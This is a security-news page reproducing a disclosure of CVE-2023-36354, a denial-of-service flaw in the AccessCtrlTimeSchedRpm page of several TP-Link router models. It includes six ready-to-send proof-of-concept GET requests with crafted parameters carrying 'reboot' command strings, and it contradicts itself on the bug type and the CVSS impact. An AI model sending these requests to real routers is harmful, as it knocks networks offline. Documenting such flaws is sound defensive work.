Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-36354: iotvul/tp-link/7/TL-WR940N_TL-WR841N_TL-WR740N_TL-WR941ND_userRpm_AccessCtrlTimeSchedRpm.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

CVE
#vulnerability#web#windows#ubuntu#linux#dos#buffer_overflow#auth#zero_day#firefox

TP-Link TL-WR940N/TL-WR841N/TL-WR740N/TL-WR941ND wireless router /userRpm/AccessCtrlTimeSchedRpm buffer read out-of-bounds vulnerability****1 Basic Information

  • Vulnerability Type: Buffer read out-of-bounds
  • Vulnerability Description: A buffer read out-of-bounds vulnerability exists in TP-Link TL-WR940N V4、TP-Link TL-WR841N V8/V10、 TP-Link TL-WR740N V1/V2、TP-Link TL-WR940N V2/V3 and TP-Link TL-WR941ND V5/V6 wireless router. Its /userRpm/AccessCtrlTimeSchedRpm component has a security vulnerability in processing Changed GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
  • Device model:
    • TP-Link TL-WR940N V4、TP-Link TL-WR841N V8/V10、TP-Link TL-WR740N V1/V2、TP-Link TL-WR940N V2/V3、TP-Link TL-WR941ND V5/V6

2 Vulnerability Value

  • Maturity of Public Information: None

  • Order of Public Vulnerability Analysis Report: None

  • Stable reproducibility: yes

  • Vulnerability Score (refer to CVSS)

    • V2:7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    • V3.1:8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Exploit Conditions

    • Attack Vector Type: Network
    • Attack Complexity: Low
    • Complexity of Exploit
      • Permission Constraints: authentication is required
      • User Interaction: No victim interaction required
    • Scope of Impact: Changed (may affect other components than vulnerable ones)
    • Impact Indicators:
      • Confidentiality: High
      • Integrity: High
      • Availability: High
    • Stability of vulnerability exploitation: Stable recurrence
    • Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
  • Exploit Effect

    • Denial of Service

3 PoC

The PoC of TP-Link TL-WR940N is as follows:

GET /ZYROEMCBUFENISDA/userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=test&day_type=1&all_hours=on&||reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1 Host: 127.0.0.1:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://127.0.0.1:8081/ZYROEMCBUFENISDA/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V10 is as follows:

GET /RODYEYNAKQNKXJXB/userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=test&day_type=1&all_hours=on&Changed|CMD=$"reboot";$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1 Host: 127.0.0.1:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://127.0.0.1:8081/RODYEYNAKQNKXJXB/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR740N is as follows:

GET /userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=WE&day_type=1&all_hours=on&||reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.1.1/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:

GET /MZKBGETBOHFWYCNC/userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=1&day_type=1&all_hours=on&ChangedCMD=$"reboot";$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:

GET /IOCGBYQCJARLTZQC/userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=1&day_type=1&all_hours=on&&CMD=$’reboot’;$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V8 is as follows:

GET /userRpm/AccessCtrlTimeSchedRpm.htm?time_sched_name=3raw4r&day_type=1&all_hours=on&||reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1 Host: 0.0.0.0:49169 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://0.0.0.0:49169/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1 Cookie: Authorization= Upgrade-Insecure-Requests: 1

4 Vulnerability Principle

When the Web management component receives a GET request, its /userRpm/AccessCtrlTimeSchedRpm component has a security vulnerability in processing the Changed GET key parameter. The Changed parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits the Changed parameter of this vulnerability to cause a buffer out-of-bounds read error, which may lead to memory-sensitive information disclosure and denial of service. Attackers can directly achieve the effect of denial of service by exploiting this vulnerability.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, the cache area read out of bounds and a BadVA error occurred, resulting in denial of service.

5. The basis for judging as a 0-day vulnerability

Searching the AccessCtrlTimeSchedRpm keyword in the NVD database did not find any vulnerabilities; searching the firmware model + parameter Changed keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907